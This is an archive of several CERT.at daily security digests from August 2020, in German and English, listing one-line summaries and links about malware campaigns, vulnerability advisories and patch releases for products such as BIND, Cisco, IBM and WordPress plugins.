https://www.fireeye.com/blog/threat-research/2020/08/bypassing-masslogger-a… ∗∗∗ Protect your organization in the age of Magecart ∗∗∗ --------------------------------------------- The continuing wave of attacks by cybercriminal groups known under the umbrella term Magecart perfectly illustrates just how unprepared many e-commerce operations are from a security point of view. It all really boils down to timing. If the e-commerce world was able to detect such Magecart attacks in a matter of seconds (rather than weeks or months), then we could see an end to Magecart stealing all of the cybercrime headlines. --------------------------------------------- https://www.helpnetsecurity.com/2020/08/24/protect-your-organization-in-the… ===================== = Vulnerabilities = ===================== ∗∗∗ WordPress WooCommerce stores under attack, patch now ∗∗∗ --------------------------------------------- Hackers are actively targeting and trying to exploit SQL injection, authorization issues, and unauthenticated stored cross-site scripting (XSS) security vulnerabilities in the Discount Rules for WooCommerce WordPress plugin with more than 30,000 installations. --------------------------------------------- https://www.bleepingcomputer.com/news/security/wordpress-woocommerce-stores… ∗∗∗ Xen Security Advisory CVE-2020-14364 / XSA-335 ∗∗∗ --------------------------------------------- An out-of-bounds read/write access issue was found in the USB emulator of the QEMU. It occurs while processing USB packets from a guest, when USBDevice->setup_len exceeds the USBDevice->data_buf[4096], in do_token_{in,out} routines. --------------------------------------------- https://xenbits.xen.org/xsa/advisory-335.html ∗∗∗ Sicherheitsupdate: VMware App Volumes abgesichert ∗∗∗ --------------------------------------------- Angreifer könnten die Anwendungsmanagement-Software App Volumes von VMware attackieren. --------------------------------------------- https://heise.de/-4876962 ∗∗∗ VMSA-2020-0018 ∗∗∗ --------------------------------------------- VMware ESXi, vCenter Server, and Cloud Foundation updates address a partial denial of service vulnerability (CVE-2020-3976) --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2020-0018.html ∗∗∗ Vulnerability Spotlight: Use-after-free vulnerability in Google Chrome WebGL could lead to code execution ∗∗∗ --------------------------------------------- The Google Chrome web browser contains a use-after-free vulnerability in its WebGL component that could allow a user to execute arbitrary code in the context of the browser process. --------------------------------------------- https://blog.talosintelligence.com/2020/08/vuln-spotlight-chrome-use-free-a… ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (firejail, icingaweb2, inetutils, libjackson-json-java, proftpd-dfsg, python2.7, software-properties, and sqlite3), Fedora (chrony), Mageia (chrony), openSUSE (dovecot23, postgresql12, and python), Slackware (bind), SUSE (gettext-runtime and SUSE Manager Server 3.2), and Ubuntu (bind9). --------------------------------------------- https://lwn.net/Articles/829486/ ∗∗∗ Synology-SA-20:19 ISC BIND ∗∗∗ --------------------------------------------- CVE-2020-8622 allows remote authenticated users to conduct denial-of-service attacks via a susceptible version of DNS Server. None of Synologys products are affected by CVE-2020-8620, CVE-2020-8621, CVE-2020-8623, or CVE-2020-8624 as these vulnerabilities only affect ISC BIND 9.9.12 and later. --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_20_19 ∗∗∗ Citrix Hypervisor Security Update ∗∗∗ --------------------------------------------- Two issues have been identified in Citrix Hypervisor that may, in certain configurations, allow privileged code in an HVM guest VM to execute code in the control domain, potentially compromising the host. --------------------------------------------- https://support.citrix.com/article/CTX280451 ∗∗∗ Squid: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0838 ∗∗∗ Security Bulletin: IBM SDK, Java Technology Edition Quarterly CPU – Jan 2020 – CVE-2020-2601 affects IBM Tivoli Composite Application Manager for Transactions-Robotic Response Time ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-sdk-java-technology-e… ∗∗∗ Security Bulletin: IBM SDK, Java Technology Edition Quarterly CPU – Jan 2020 – Includes Oracle Jan 2020 CPU affects IBM Tivoli Composite Application Manager for Transactions-Robotic Response Time ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-sdk-java-technology-e… ∗∗∗ Security Bulletin: A vulnerability has been identified in IBM Elastic Storager Server where an attacker can cause a denial of service (CVE-2020-4383) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-has-been-… ∗∗∗ Security Bulletin: Multiple Vulnerabilities in IBM Java Runtime Affect IBM Sterling Connect:Direct for UNIX ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ Security Bulletin: IBM Security Guardium Insights is affected by a ClickJacking vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-ins… ∗∗∗ Security Bulletin: IBM Security Guardium Insights is affected by a Components with known vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-ins… ∗∗∗ Security Bulletin: Multiple Vulnerabilities in IBM Java Runtime Affect IBM Sterling Connect:Direct for UNIX ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: IBM Security Guardium Insights is affected by a components with known vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-ins… ∗∗∗ Security Bulletin: IBM Security Guardium Insights is affected by an Open Redirect vulnerabilitiy ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-ins… ∗∗∗ Security Bulletin: Vulnerability in Bash affects IBM Spectrum Protect Plus (CVE-2019-9924) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-bash-aff… ∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to multiple node.js vulnerabilities (CVE-2020-11080, CVE-2020-10531, CVE-2020-8172, CVE-2020-8174) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln… ∗∗∗ Security Bulletin: Multiple Java vulnerabilities affect IBM Spectrum Protect Plus (CVE-2020-2805, CVE-2020-2803, CVE-2020-2830, CVE-2020-2781, CVE-2020-2800. CVE-2020-2757, CVE-2020-2756, CVE-2020-2755, CVE-2020-2754) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-java-vulnerabili… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 21.08.2020
by Daily end-of-shift report 21 Aug '20

21 Aug '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 20-08-2020 18:00 − Freitag 21-08-2020 18:00 Handler: Stephan Richter Co-Handler: Thomas Pribitzer ===================== = News = ===================== ∗∗∗ Malware can no longer disable Microsoft Defender via the Registry ∗∗∗ --------------------------------------------- Microsoft has removed the ability to disable Microsoft Defender and third-party security software via the Registry to prevent malware from tampering with protection settings. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/malware-can-no-longer-disab… ∗∗∗ Emotet Malware Over the Years: The History of an Active Cyber-Threat ∗∗∗ --------------------------------------------- Malware strains come and go while Internet users become more and more accustomed to online threats being dealt with swiftly by the competent authorities. But what happens when a Trojan constantly eludes everyone’s best efforts to stop it in its tracks? --------------------------------------------- https://heimdalsecurity.com/blog/emotet-malware-history/ ∗∗∗ From SSRF to Compromise: Case Study ∗∗∗ --------------------------------------------- SSRF is a neat bug because it jumps trust boundaries. You go from being the user of a web application to someone on the inside, someone who can reach out and touch things on behalf of the vulnerable server. Exploiting SSRF beyond a proof-of-concept callback is often tricky because the impact is largely dependent on the environment you’re making that internal request in. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/from-ssrf-t… ∗∗∗ MISP 2.4.130 released (Various fixes, performance improvements and new features) ∗∗∗ --------------------------------------------- MISP 2.4.130 releasedA new version of MISP (2.4.130) has been released with performance improvements, multiple bugs fixed and new features. --------------------------------------------- https://www.misp-project.org/2020/08/21/MISP.2.4.130.released.html ∗∗∗ Aggressive DDoS-Erpresser von Fancy Bear sind wieder aktiv ∗∗∗ --------------------------------------------- Vor erneuten DDoS-Erpressungen im Namen von Fancy Bear, die von großvolumigen DDoS-Attacken begleitet werden, hat jetzt das Link11 Security Operation Center gewarnt. Laut des IT-Sicherheitsanbieters Link11 zählen zu den angegriffenen Unternehmen auch KRITIS-Betreiber. --------------------------------------------- https://www.zdnet.de/88382211/aggressive-ddos-erpresser-von-fancy-bear-sind… ===================== = Vulnerabilities = ===================== *** BIND Security Advisories *** --------------------------------------------- CVE-2020-8620: A specially crafted large TCP payload can trigger an assertion failure in tcpdns.c CVE-2020-8621: Attempting QNAME minimization after forwarding can lead to an assertion failure in resolver.c CVE-2020-8622: A truncated TSIG response can lead to an assertion failure CVE-2020-8623: A flaw in native PKCS#11 code can lead to a remotely triggerable assertion failure in pk11.c CVE-2020-8624: update-policy rules of type "subdomain" are enforced incorrectly --------------------------------------------- https://kb.isc.org/docs/cve-2020-8620 https://kb.isc.org/docs/cve-2020-8621 https://kb.isc.org/docs/cve-2020-8622 https://kb.isc.org/docs/cve-2020-8623 https://kb.isc.org/docs/cve-2020-8624 ∗∗∗ Sicherheitsupdates: Wieder eine "vergessene" Hintertür in Cisco-Produkten ∗∗∗ --------------------------------------------- Angreifer könnten unter anderem Cisco vWAAS, Smart Software Manager und Video Surveillance 8000 Series attackieren. --------------------------------------------- https://heise.de/-4875646 ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (ghostscript), Fedora (curl and mod_http2), Mageia (ngircd), openSUSE (kernel), SUSE (libreoffice), and Ubuntu (curl). --------------------------------------------- https://lwn.net/Articles/829280/ ∗∗∗ CERT/CC Warns of Vulnerabilities in Diebold Nixdorf, NCR ATMs ∗∗∗ --------------------------------------------- The CERT Coordination Center (CERT/CC) at Carnegie Mellon University has published alerts on several vulnerabilities that impact Diebold Nixdorf ProCash and NCR SelfServ automated teller machines (ATMs). --------------------------------------------- https://www.securityweek.com/certcc-warns-vulnerabilities-diebold-nixdorf-n… ∗∗∗ Security Bulletin: Vulnerability in WebSphere Application Server Liberty affects IBM Spectrum Control (CVE-2020-4329) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-webspher… ∗∗∗ Security Bulletin: Golang Vulnerabilities in IBM Cloud CLI 1.1.0 or earlier ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-golang-vulnerabilities-in… ∗∗∗ Security Bulletin: IBM MQ for HPE NonStop Server is affected by vulnerability CVE-2020-4465 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-for-hpe-nonstop-se… ∗∗∗ Security Bulletin: Information disclosure vulnerability in WebSphere Application Server Liberty ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-vu… ∗∗∗ Security Bulletin: Vulnerabilities in Node.js affect IBM Spectrum Control (CVE-2020-8172, CVE-2020-8174, CVE-2020-11080) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-node-j… ∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to an information disclosure and denial of service (CVE-2020-4414) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-… ∗∗∗ Security Bulletin: Vulnerabilities in IBM Java SDK affect IBM Spectrum Control (CVE-2020-2654, CVE-2020-2781, CVE-2020-2800) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-ja… ∗∗∗ Security Bulletin: IBM MQ for HPE NonStop Server is affected by vulnerability CVE-2020-4375 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-for-hpe-nonstop-se… ∗∗∗ Security Bulletin: WebSphere Application Server is vulnerable to a remote code execution vulnerability (CVE-2020-4589) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-websphere-application-ser… ∗∗∗ August 20, 2020 TNS-2020-06 [R1] Nessus 8.11.1 Fixes One Vulnerability ∗∗∗ --------------------------------------------- http://www.tenable.com/security/tns-2020-06 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 20.08.2020
by Daily end-of-shift report 20 Aug '20

20 Aug '20

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 19-08-2020 18:00 − Donnerstag 20-08-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Lucifer cryptomining DDoS malware now targets Linux systems ∗∗∗ --------------------------------------------- A hybrid DDoS botnet known for turning vulnerable Windows devices into Monero cryptomining bots is now also scanning for and infecting Linux systems. --------------------------------------------- https://www.bleepingcomputer.com/news/security/lucifer-cryptomining-ddos-ma… ∗∗∗ Transparent Tribe: Evolution analysis,part 1 ∗∗∗ --------------------------------------------- Transparent Tribe, also known as PROJECTM and MYTHIC LEOPARD, is a highly prolific group whose activities can be traced as far back as 2013. Proofpoint published a very good article about them in 2016, and since that day, we have kept an eye on the group. [...] The USBWorm component is real, and it has been detected on hundreds of systems. This is malware whose existence was already speculated about years ago, but as far as we know, it has never been publicly described. --------------------------------------------- https://securelist.com/transparent-tribe-part-1/98127/ ∗∗∗ Office 365 Mail Forwarding Rules (and other Mail Rules too), (Thu, Aug 20th) ∗∗∗ --------------------------------------------- If you haven't heard, SANS suffered a "Data Incident" this summer, the disclosure was released on August 11. Details can be found in several locations: [...] So that being said, how can we look for these things if you have hundreds, thousands or tens-of-thousands of mailboxes to consider? In an Office 365 shop, and especially if I wrote the code, the answer is most likely going to be PowerShell! --------------------------------------------- https://isc.sans.edu/diary/rss/26484 ∗∗∗ IBM Db2 Shared Memory Vulnerability (CVE-2020-4414) ∗∗∗ --------------------------------------------- I’ve recently blogged about a shared memory vulnerability in Cisco WebEx Meetings Client on Windows where any user can read memory dedicated to trace data. It turns out that this is a common problem. IBM Db2 is affected by the exact same type of problem. Developers forgot to put explicit memory protections around the shared memory used by the Db2 trace facility. This allows any local users read and write access to that memory area. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/ibm-db2-sha… ∗∗∗ Kriminelle versuchen Zugangsdaten zum Online-Banking zu klauen! ∗∗∗ --------------------------------------------- Haben Sie in den letzten Tagen auch eine E-Mail der „BawagPSK“ erhalten? Wenn ja, seien Sie vorsichtig! Es sind derzeit wieder vermehrt betrügerische Nachrichten unterwegs, in denen die Kriminellen Ihnen vorgaukeln, dass Sie die neue Sicherheits-App installieren müssen, damit Ihr Online-Banking funktioniert. Tatsächlich geht es aber nur darum, an Ihre Zugangsdaten zu kommen! --------------------------------------------- https://www.watchlist-internet.at/news/kriminelle-versuchen-zugangsdaten-zu… ∗∗∗ Google fixes major Gmail bug seven hours after exploit details go public ∗∗∗ --------------------------------------------- Attackers could have sent spoofed emails mimicking any Gmail or G Suite customer. --------------------------------------------- https://www.zdnet.com/article/google-fixes-major-gmail-bug-seven-hours-afte… ===================== = Vulnerabilities = ===================== ∗∗∗ Cisco Security Advisories 2020-08-19 ∗∗∗ --------------------------------------------- Cisco hat 24 Security-Advisories veröffentlicht, davon wurden 1 als Kritisch und 2 als Hoch eingestuft. --------------------------------------------- https://tools.cisco.com/security/center/Search.x?publicationTypeIDs=1&first… ∗∗∗ Wichtige Sicherheitsupdates für Windows 8.1/Server 2012 R2 veröffentlicht ∗∗∗ --------------------------------------------- Microsoft sichert Windows 8.1 und Windows Server 2012 R2 außer der Reihe ab. --------------------------------------------- https://heise.de/-4874571 ∗∗∗ High-Severity Vulnerability Patched in Advanced Access Manager ∗∗∗ --------------------------------------------- On August 13, 2020, the Wordfence Threat Intelligence team finished investigating two vulnerabilities in Advanced Access Manager, a WordPress plugin with over 100,000 installations, including a high-severity Authorization Bypass vulnerability that could lead to privilege escalation and site takeover. --------------------------------------------- https://www.wordfence.com/blog/2020/08/high-severity-vulnerability-patched-… ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Fedora (ansible, libmetalink, roundcubemail, rubygem-kramdown, sqlite, and swtpm), Slackware (curl), SUSE (python and python3), and Ubuntu (qemu). --------------------------------------------- https://lwn.net/Articles/829181/ ∗∗∗ Security Advisory - Integer Overflow Vulnerability in Huawei Smartphone ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200819-… ∗∗∗ Security Advisory - Out Of Bound Read Vulnerability in Huawei Smartphone ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200819-… ∗∗∗ Security Advisory - Information Leak Vulnerability in Huawei Products ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200819-… ∗∗∗ Security Bulletin: IBM Content Navigator is susceptible to a sensitive data exposure. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-content-navigator-is-… ∗∗∗ Security Bulletin: Vulnerability in Bash affects IBM Spectrum Protect Plus (CVE-2019-9924) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-bash-aff… ∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to buffer overflow leading to a privileged escalation (CVE-2020-4363) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-… ∗∗∗ Security Bulletin: IBM Content Manager is affected by a potential information disclosure vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-content-manager-is-af… ∗∗∗ Security Bulletin: IBM Content Navigator is vulnerable to an Elliptic Curve Key Disclosure. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-content-navigator-is-… ∗∗∗ Security Bulletin: Autocomplete not disabled for password field in IBM Content Navigator. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-autocomplete-not-disabled… ∗∗∗ Security Bulletin: IBM Content Navigator is vulnerable to improper input validation ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-content-navigator-is-… ∗∗∗ Security Bulletin: vulnerability in snakeyaml might affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2017-18640 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-snakeyam… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 19.08.2020
by Daily end-of-shift report 19 Aug '20

19 Aug '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 18-08-2020 18:00 − Mittwoch 19-08-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ FritzFrog malware attacks Linux servers over SSH to mine Monero ∗∗∗ --------------------------------------------- A sophisticated botnet campaign named FritzFrog has been discovered breaching SSH servers around the world, since at least January 2020. --------------------------------------------- https://www.bleepingcomputer.com/news/security/fritzfrog-malware-attacks-li… ∗∗∗ Example of Word Document Delivering Qakbot, (Wed, Aug 19th) ∗∗∗ --------------------------------------------- Qakbot is back on stage at the moment! Many security companies already reported some peaks of activity around this malware. On my side, I also spotted several samples. The one that I'll cover today has been reported by one of our readers (thanks to him) and deserves a quick analysis of the obfuscation used by the attackers. It is not available on VT at this time (SHA256:507312fe58352d75db057aee454dafcdce2cdac59c0317255e30a43bfa5dffbc) --------------------------------------------- https://isc.sans.edu/diary/rss/26482 ∗∗∗ CDN-Filestore Credit Card Stealer for Magento ∗∗∗ --------------------------------------------- During a website remediation, we recently discovered a new version of a Magento credit card stealer which sends all compromised data to the malicious domain cdn-filestore[dot]com. My colleague Luke Leal originally wrote about this malware in a blog post earlier this year. Malware Evolution & Evasive Techniques One primary difference between this new version and theone Luke wrote about in April is that it was not packed. This detail suggests that the attackers updated the malware in an [...] --------------------------------------------- https://blog.sucuri.net/2020/08/cdn-filestore-credit-card-stealer-for-magen… ∗∗∗ Voice Phishers Targeting Corporate VPNs ∗∗∗ --------------------------------------------- The COVID-19 epidemic has brought a wave of email phishing attacks that try to trick work-at-home employees into giving away credentials needed to remotely access their employers networks. But one increasingly brazen group of crooks is taking your standard phishing attack to the next level, marketing a voice phishing service that uses a combination of one-on-one phone calls and custom phishing sites to steal VPN credentials from employees. --------------------------------------------- https://krebsonsecurity.com/2020/08/voice-phishers-targeting-corporate-vpns/ ∗∗∗ Angriff der Insta‑Klone ∗∗∗ --------------------------------------------- Unser Autor macht den Test: Mit einem geklonten Social-Media-Account und psychologischem Geschick lassen sich seine Kontakte ausnutzen und Betrügen. Vorsicht ist angesagt. --------------------------------------------- https://www.welivesecurity.com/deutsch/2020/08/18/angriff-der-insta-klone/ ∗∗∗ 10 WordPress Security Mistakes You Might Be Making ∗∗∗ --------------------------------------------- Yesterday, August 18, 2020, the Wordfence Live team covered 10 WordPress Security Mistakes You Might be Making. This companion blog post reviews the recommendations we provided to avoid these mistakes and better secure your WordPress environment. --------------------------------------------- https://www.wordfence.com/blog/2020/08/10-wordpress-security-mistakes-you-m… ∗∗∗ Ongoing Campaign Uses HTML Smuggling for Malware Delivery ∗∗∗ --------------------------------------------- An ongoing cybercrime campaign is employing a technique known as HTML smuggling to deliver malware onto the victim’s machine, Menlo Security reports. Referred to as Duri, the campaign started in early July and continues to date, attempting to evade network security solutions, including proxies and sandboxes, to deliver malicious code. --------------------------------------------- https://www.securityweek.com/ongoing-campaign-uses-html-smuggling-malware-d… ∗∗∗ Zahlreiche Meldungen zu hilufon.de, applefy.de und coyshop.de ∗∗∗ --------------------------------------------- Auf den unterschiedlichen Websites der appl handels ug werden und wurden diverse iPhone Modelle angeboten. Es handelt sich dabei um gebrauchte Geräte. Zahlreiche InternetuserInnen wenden sich jedoch an die Watchlist Internet und klagen über ausbleibende oder stark verspätete Lieferungen und andere Probleme mit dem Anbieter. Auch auf Bewertungsportalen zeigt sich ein ähnliches Bild. --------------------------------------------- https://www.watchlist-internet.at/news/zahlreiche-meldungen-zu-hilufonde-ap… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (imagemagick and ruby-websocket-extensions), Fedora (libetpan, LibRaw, and php), Gentoo (nss), Mageia (apache, ark, clamav, claws-mail, dovecot, firefox, firejail, freerdp, golang, jasper, kernel, libssh, libx11, postgresql-jdbc, python-rstlib, radare2, roundcubemail, squid, targetcli, thunderbird, tomcat, and x11-server), Red Hat (rh-mysql80-mysql), SUSE (dovecot22, freerdp, libvirt, and postgresql12), and Ubuntu (curl and linux-hwe, linux-azure-5.3, [...] --------------------------------------------- https://lwn.net/Articles/829102/ ∗∗∗ Vulnerability in Thales Product Could Expose Millions of IoT Devices to Attacks ∗∗∗ --------------------------------------------- Security researchers at IBM have discovered a potentially serious vulnerability in a communications module made by Thales for IoT devices. Millions of devices could be impacted, but the vendor released a patch six months ago. --------------------------------------------- https://www.securityweek.com/vulnerability-thales-product-could-expose-mill… ∗∗∗ Security Advisory - Denial of Service Vulnerability in SmartPhone Product ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200819-… ∗∗∗ Security Bulletin: Vulnerability identified in docker for Red Hat Enterprise Linux ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-identified-… ∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to IBM WebSphere Application Server Liberty vulnerabilities (CVE-2020-4303, CVE-2020-4304) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln… ∗∗∗ Security Bulletin: A vulnerability has been identified in IBM Elastic Storager Server GUI where authorised user can execute unauthorized function (CVE-2020-4378) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-has-been-… ∗∗∗ Security Bulletin: A Security Vulnerability affects IBM Cloud Private – OpenSSL (CVE-2019-1551) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-… ∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to a Kubernetes vulnerability (CVE-2019-11254) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln… ∗∗∗ Security Bulletin: Vulnerability in GNU gettext affects IBM Spectrum Protect Plus (CVE-2018-18751) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-gnu-gett… ∗∗∗ Security Bulletin: IBM Elastic Storage Server GUI is affected by cross-site scripting (CVE-2020-4358) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-serve… ∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to an IBM WebSphere Application Server Liberty vulnerability (CVE-2019-17573) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln… ∗∗∗ Security Bulletin: Publicly disclosed vulnerabilities from Kernel affect IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ Security Bulletin: Multiple Vulnerabilities in IBM Java Runtime affect IBM Cloud Private ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 18.08.2020
by Daily end-of-shift report 18 Aug '20

18 Aug '20

===================== = End-of-Day report = ===================== Timeframe: Montag 17-08-2020 18:00 − Dienstag 18-08-2020 18:00 Handler: Robert Waldner Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Cryptojacking worm steals AWS credentials from Docker systems ∗∗∗ --------------------------------------------- According to researchers at Cado Security this is the first-ever worm that comes with AWS credential theft functionality on top of run-of-the-mill cryptomining modules. This botnet uses already infected servers to execute an open-source masscan IP port scanner instance that scans for exposed Docker APIs (and Kubernetes systems as later discovered), installing itself in new containers on any misconfigured servers it finds. --------------------------------------------- https://www.bleepingcomputer.com/news/security/cryptojacking-worm-steals-aw… ∗∗∗ E-Mail: Gefährliche Mailto-Links können Daten stehlen ∗∗∗ --------------------------------------------- Dieses Feature für Dateianhänge ist nicht Teil der Standardspezifikation für Mailto-Links. Es handelt sich um eine inoffizielle Erweiterung, die von einigen Mailprogrammen genutzt wird. Laut der Veröffentlichung wird das Feature in Kmail und Evolution unterstützt, die Standardmailprogramme der Linux-Desktopumgebungen KDE und Gnome. Auch IBM Notes unterstützen das Feature. Thunderbird ist zwar selbst nicht betroffen, kann aber verwundbar sein, wenn die Verarbeitung der Mailto-Links über das Tool xdg-open erfolgt. --------------------------------------------- https://www.golem.de/news/e-mail-gefaehrliche-mailto-links-koennen-daten-st… ∗∗∗ Pre-announcement of five BIND security issues scheduled for disclosure 20 August 2020 ∗∗∗ --------------------------------------------- We therefore are writing to inform you that the August BIND maintenance releases that will be released on Thursday, 20 August, contain patches for five separate vulnerabilities. Further details about the vulnerabilities will be publicly disclosed at the time the releases are published on Thursday. --------------------------------------------- https://lists.isc.org/pipermail/bind-announce/2020-August/001161.html ∗∗∗ Online- Anlagen- und Investitionsbetrug floriert ∗∗∗ --------------------------------------------- Laufend treten von Investitionsbetrug betroffene Konsumentinnen und Konsumenten an die Watchlist Internet heran. Die Methoden der Kriminellen sind dabei fast immer die gleichen. Erfundene Werbeschaltungen, hohe Gewinnversprechen und persönliche Betreuung verleiten die Opfer zu großen Investitionen. Im Endergebnis führt dies zu mitunter existenzbedrohenden Schadenssummen. --------------------------------------------- https://www.watchlist-internet.at/news/online-anlagen-und-investitionsbetru… ===================== = Vulnerabilities = ===================== ∗∗∗ Rocket.Chat Cross-Site Scripting leading to Remote Code Execution CVE-2020-15926 ∗∗∗ --------------------------------------------- A malicious user can send a specially crafted message either to a channel or in a direct message to another user which will result in executing JavaScript in the victim's browser or inside the desktop client when the victim will use the 'Reply in Thread' functionality. In the case of desktop clients cross-site scripting (XSS) vulnerability leads to a remote code execution (RCE) --------------------------------------------- https://blog.redteam.pl/2020/08/rocket-chat-xss-rce-cve-2020-15926.html ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (sane-backends), Fedora (kernel, LibRaw, and wob), openSUSE (balsa, hylafax+, postgresql, postgresql96, postgresql10, postgresql12, and postgresql96, postgresql10 and postgresql12), Oracle (.NET Core 3.1), Red Hat (bash and bind), SUSE (dovecot23, firefox, fwupd, postgresql10, postgresql12, python-azure-agent, and zabbix), and Ubuntu (ark, gnome-shell, libonig, linux, linux-aws, linux-kvm, linux-lts-xenial, linux-raspi2, linux-snapdragon, linux-gke-5.0, linux-oem-osp1 and software-properties). --------------------------------------------- https://lwn.net/Articles/829030/ ∗∗∗ Vulnerability Allowing Full Server Takeover Found in Concrete5 CMS ∗∗∗ --------------------------------------------- The issue was identified in Concrete5 version 8.5.2, which essentially allowed an attacker to modify site configuration and upload a PHP file onto the server, thus gaining arbitrary command execution capabilities. --------------------------------------------- https://www.securityweek.com/vulnerability-allowing-full-server-takeover-fo… ∗∗∗ Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance Security Update ∗∗∗ --------------------------------------------- Multiple vulnerabilities have been discovered in Citrix ADC (formerly 